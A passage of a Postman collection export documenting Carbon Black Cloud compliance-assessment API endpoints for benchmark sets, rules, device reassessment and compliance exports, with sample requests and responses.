(CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"57fb68fc-72a4-4567-ab40-ffa5146678c6"},{"name":"Search Rules in a Benchmark Set","id":"5f7b42e6-cd3d-4701-a614-9cd3db2790b4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": 1,\n    \"start\": 0,\n    \"sort\": [\n        {\n            \"field\": \"section_name\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/rules/_search","description":"<p>Search for rules within a Benchmark Set.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-body\">Request Body</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n   \"query\": \"&lt;string&gt;\",\n   \"rows\": \"&lt;integer&gt;\",\n   \"start\": \"&lt;integer&gt;\",\n   \"criteria\": {\n       \"&lt;fieldname&gt;\": [\n           \"&lt;value&gt;\"\n       ]},\n     \"sort\": {\n         \"field\": \"&lt;string&gt;\",\n         \"order\": \"&lt;string&gt;\"\n     }\n }\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/llatest/compliance-assessment/#search-rules-in-a-benchmark-set\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","rules","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"9c62ecf1-4cc8-40f6-991e-2564a91ea451","name":"Search Rules in a Benchmark Set","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":" {\n   \"query\": \"windows\",\n   \"rows\": 1,\n   \"start\": 0,\n   \"sort\": [{\n     \"field\": \"section_name\",\n     \"order\": \"DESC\"\n   }]\n }","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/rules/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 57,\n    \"results\": [\n        {\n            \"id\": \"75D1C537-FF92-4B46-9875-9549AA088BC9\",\n            \"rule_name\": \"(L1) Ensure 'Configure Automatic Updates' is set to 'Enabled'\",\n            \"enabled\": true,\n            \"section_id\": \"D5F265D0-6087-61C8-D6F9-9AE0B7AFB06B\",\n            \"section_name\": \"Windows Update\"\n        }\n    ]\n}"}],"_postman_id":"5f7b42e6-cd3d-4701-a614-9cd3db2790b4"},{"name":"Get All Benchmark Set Sections","id":"1a87df7b-787d-45e4-a3c5-0ec19b75ea20","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/sections","description":"<p>Returns the Id and Name of all sections with the Id of the benchmark that contains the section.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/llatest/compliance-assessment/#get-all-benchmark-set-sections\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","sections"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"ca3844d6-28b7-49d6-8c42-3da5f1b44aa8","name":"Search Rules in a Benchmark Set","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":" {\n   \"query\": \"windows\",\n   \"rows\": 1,\n   \"start\": 0,\n   \"sort\": [{\n     \"field\": \"section_name\",\n     \"order\": \"DESC\"\n   }]\n }","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/rules/_search"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 57,\n    \"results\": [\n        {\n            \"id\": \"75D1C537-FF92-4B46-9875-9549AA088BC9\",\n            \"rule_name\": \"(L1) Ensure 'Configure Automatic Updates' is set to 'Enabled'\",\n            \"enabled\": true,\n            \"section_id\": \"D5F265D0-6087-61C8-D6F9-9AE0B7AFB06B\",\n            \"section_name\": \"Windows Update\"\n        }\n    ]\n}"}],"_postman_id":"1a87df7b-787d-45e4-a3c5-0ec19b75ea20"},{"name":"Get Specified Rule","id":"ada734f3-b7ce-4ba4-af25-0fb289a93442","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/rules/{{cb_benchmark_set_rule_id}}","description":"<p>Returns the Id and Name of all sections with the Id of the benchmark that contains the section.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/llatest/compliance-assessment/#get-all-benchmark-set-sections\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","rules","{{cb_benchmark_set_rule_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"118b8523-762a-49e5-b7cb-3d981c259ad8","name":"Search Rules in a Benchmark Set","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":" {\n   \"query\": \"windows\",\n   \"rows\": 1,\n   \"start\": 0,\n   \"sort\": [{\n     \"field\": \"section_name\",\n     \"order\": \"DESC\"\n   }]\n }","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/rules/_search"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 57,\n    \"results\": [\n        {\n            \"id\": \"75D1C537-FF92-4B46-9875-9549AA088BC9\",\n            \"rule_name\": \"(L1) Ensure 'Configure Automatic Updates' is set to 'Enabled'\",\n            \"enabled\": true,\n            \"section_id\": \"D5F265D0-6087-61C8-D6F9-9AE0B7AFB06B\",\n            \"section_name\": \"Windows Update\"\n        }\n    ]\n}"}],"_postman_id":"ada734f3-b7ce-4ba4-af25-0fb289a93442"},{"name":"Update Benchmark Set Rules","id":"8b0a8b8a-fa4f-468c-b7b2-36e67c72ca0d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"rule_id\": \"<string>\",\n        \"enabled\": <boolean>\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/rules","description":"<p>Configure which rules are enabled and disabled within a Benchmark Set.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-body\">Request Body</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">[\n    {\n        \"rule_id\": \"&lt;string&gt;\",\n        \"enabled\": &lt;boolean&gt;\n    }\n]\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#update-benchmark-set-rules\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","rules"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"8b0a8b8a-fa4f-468c-b7b2-36e67c72ca0d"},{"name":"Execute Action on a Benchmark Set - Enable, Disable, Reassess","id":"78b1dd70-2c40-4a08-955a-23192b570f33","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"action\": \"Choose: ENABLE DISABLE REASSESS\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/actions","description":"<p>Enable or disable a Benchmark Set or trigger a reassessment using the Benchmark Set.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-body\">Request Body</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"action\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#execute-action-on-a-benchmark-set\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","actions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"478691ca-dfbe-49c2-8144-da46ac07f9e2","name":"Execute Action on a Benchmark Set","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"action\": \"ENABLE\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/actions"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"status_code\": \"SUCCESS\",\n    \"message\": \"Benchmark set for Microsoft Windows Server is enabled\"\n}"}],"_postman_id":"78b1dd70-2c40-4a08-955a-23192b570f33"},{"name":"Execute Action on Specified Devices in a Benchmark Set.","id":"fd9a42c5-741e-45b2-83b9-cdb3d160ec01","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n\"action\":\"REASSESS\",\n\"device_ids\":[{{cb_device_id}}]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/device_actions","description":"<p>Take the specified action on each device specified in the request.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>EXECUTE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-body\">Request Body</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"action\": \"&lt;string&gt;\",\n  \"device_ids\": [ &lt;integer&gt; ]\n}\n\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#execute-action-on-specified-devices-in-a-benchmark-set\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","compliance","device_actions"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"fd9a42c5-741e-45b2-83b9-cdb3d160ec01"}],"id":"c5ef70b9-4d3f-414c-ae94-5d44867afa95","description":"<p>Search, modify, enable or disable, and delete Benchmark Sets and their Rules.</p>\n","_postman_id":"c5ef70b9-4d3f-414c-ae94-5d44867afa95","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Compliance Information","item":[{"name":"Search Compliance Summaries for a Benchmark Set","id":"373eef4c-a93a-4a8b-9db2-e8d89ad17d8d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"firewall\",\n    \"rows\": 50,\n    \"sort\": [\n        {\n            \"field\": \"compliant_assets\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/compliance/summary/_search","description":"<p>Search compliance summaries for specified Benchmark Set.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-body\">Request Body</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"query\": \"&lt;string&gt;\",\n    \"rows\": \"&lt;integer&gt;\",\n    \"start\": \"&lt;integer&gt;\",\n    \"criteria\": {\n        \"&lt;fieldname&gt;\": [\n            \"&lt;value&gt;\"\n        ]\n    },\n    \"exclusions\": {\n        \"&lt;fieldname&gt;\": [\n            \"&lt;value&gt;\"\n        ]\n    },\n    \"sort\": {\n        \"field\": \"&lt;string&gt;\",\n        \"order\": \"&lt;string&gt;\"\n    }\n}\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#search-compliance-summaries-for-a-benchmark-set\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","compliance","summary","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"3baa1747-041d-4403-a18c-dc30ab54ec0c","name":"Search Benchmark Set Compliance Summaries","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"compliance\",\n    \"rows\": \"2\",\n    \"sort\": [{\n        \"field\": \"name\",\n        \"order\": \"DESC\"\n    }]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/compliance/summary/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 1,\n    \"results\": [\n        {\n            \"org_key\": \"1234ABCD\",\n            \"benchmark_set_id\": \"001dc37a-073c-4d56-a9ce-0246c22c85a6\",\n            \"name\": \"CIS Compliance - Microsoft Windows Server\",\n            \"compliant\": 0,\n            \"non_compliant\": 14,\n            \"excluded\": 1\n        }\n    ]\n}"}],"_postman_id":"373eef4c-a93a-4a8b-9db2-e8d89ad17d8d"},{"name":"Search Compliance Information for Devices","id":"3d687f25-5236-472f-aca8-4bd581d72b1e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"<string>\",\n    \"rows\": \"<integer>\",\n    \"start\": \"<integer>\",\n    \"criteria\": \"<object>\",\n    \"exclusions\": \"<object>\",\n    \"sort\": [\n        {\n            \"field\": \"<string>\",\n            \"order\": \"<string>\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/devices/_search","description":"<p>Search Compliance Information for Devices</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"query\": \"&lt;string&gt;\",\n    \"rows\": \"&lt;integer&gt;\",\n    \"start\": \"&lt;integer&gt;\",\n    \"criteria\": \"&lt;object&gt;\",\n    \"exclusions\": \"&lt;object&gt;\",\n    \"sort\": [\n        {\n            \"field\": \"&lt;string&gt;\",\n            \"order\": \"&lt;string&gt;\"\n        }\n    ]\n}\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#search-compliance-information-for-devices\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","compliance","devices","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"a2cfb2e9-d998-48cd-bf51-dc63d9858cb1","name":"Search Compliance Information for Devices","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": 1,\n    \"start\": 0\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/devices/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": \"1\",\n    \"results\": {\n        \"device_id\": \"13579\",\n        \"device_name\": \"Windows 2019 desktop\",\n        \"os_version\": \"Windows server 2019\",\n        \"compliance_percentage\": 95,\n        \"last_assess_time\": \"2022-05-05T010:15:30.000Z\",\n        \"excluded_on\": \"2022-05-05T010:15:30.000Z\",\n        \"excluded_by\": \"User\",\n        \"reason\": \"Excepted By User\"\n    }\n}"}],"_postman_id":"3d687f25-5236-472f-aca8-4bd581d72b1e"},{"name":"Export Compliance Information for Devices","id":"6ce206b5-2552-48f3-a2f5-bc5b5e658308","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": \"1\",\n    \"start\": \"0\",\n    \"sort\": [\n        {\n            \"field\": \"device_name\",\n            \"order\": \"ASC\"\n        }\n    ],\n    \"format\": \"CSV\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/devices/_export","description":"<p>The export endpoint is asynchronous; firstly use the endpoint defined here to create a job with required search criteria to limit the results, then use the <a href=\"http://localhost:1313/reference/carbon-black-cloud/platform/latest/job-service-api/#download-job-output\">Download Job Output</a> in the Jobs Service to get the results. The Download Job API requires the permission <code>jobs.status - READ</code>.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"query\": \"&lt;string&gt;\",\n    \"rows\": \"&lt;integer&gt;\",\n    \"start\": \"&lt;integer&gt;\",\n    \"criteria\": {\n        \"&lt;fieldname&gt;\": [\n            \"&lt;value&gt;\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"&lt;string&gt;\",\n            \"order\": \"&lt;string&gt;\"\n        }\n    ],\n    \"format\": \"&lt;string&gt;\"\n}\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#export-compliance-information-for-devices\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","compliance","devices","_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"81fe81b2-32c7-4378-92c3-bae38f28f58c","name":"Export Compliance Information for Devices","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": \"1\",\n    \"start\": \"0\",\n    \"sort\": [\n        {\n            \"field\": \"device_name\",\n            \"order\": \"ASC\"\n        }\n    ],\n    \"format\": \"CSV\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/devices/_export"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": 211024\n}"},{"id":"3534f4f2-b8e0-44c3-bcb8-9259653a6aa2","name":"Download Job Output","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/download"},"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":"\"VM Name\",\"Compliance Percentage\",\"Last Assessment Time\",\"OS Version\"\n\"MYDOMAIN\\\\DEMOMACHINE\",\"95\",\"2023-02-03\",\"Windows Server 2022 x64\"\n\"MYDOMAIN\\\\WORKMACHINE\",\"95\",\"2023-02-03\",\"Windows Server 2022 x64\""}],"_postman_id":"6ce206b5-2552-48f3-a2f5-bc5b5e658308"},{"name":"Search Rule Compliance Summaries","id":"68719853-ad22-4b44-96b2-a8a08855bd56","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": \"1\",\n    \"start\": \"0\",\n    \"sort\": [\n        {\n            \"field\": \"rule_name\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/rules/_search","description":"<p>Returns the compliance summaries for rules that match the search criteria.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>complianceAssessment.data</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"query\": \"&lt;string&gt;\",\n    \"rows\": \"&lt;integer&gt;\",\n    \"start\": \"&lt;integer&gt;\",\n    \"criteria\": \"&lt;object&gt;\",\n    \"exclusions\": \"&lt;object&gt;\",\n    \"sort\": [\n        {\n            \"field\": \"&lt;string&gt;\",\n            \"order\": \"&lt;string&gt;\"\n        }\n    ]\n}\n</code></pre>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/compliance-assessment/#search-compliance-information-for-rules\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["compliance","assessment","api","v1","orgs","{{cb_org_key}}","benchmark_sets","{{cb_benchmark_set_id}}","compliance","rules","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"7ed00149-76ae-4b66-b5b2-0c88bd16e396","name":"Search Rule Compliance Summaries","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"windows\",\n    \"rows\": \"1\",\n    \"start\": \"0\",\n    \"sort\": [\n        {\n            \"field\": \"rule_name\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/compliance/assessment/api/v1/orgs/{{cb_org_key}}/benchmark_sets/{{cb_benchmark_set_id}}/compliance/rules/_search"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 349,\n    \"results\": [\n        {\n            \"rule_id\": \"00869D86-6E61-4D7D-A0A3-6F5CDE2E5753\",\n            \"rule_name\": \"(L1) Ensure 'Windows Firewall: Private: Firewall state' is set to 'On (recommended)'\",\n            \"section_id\": 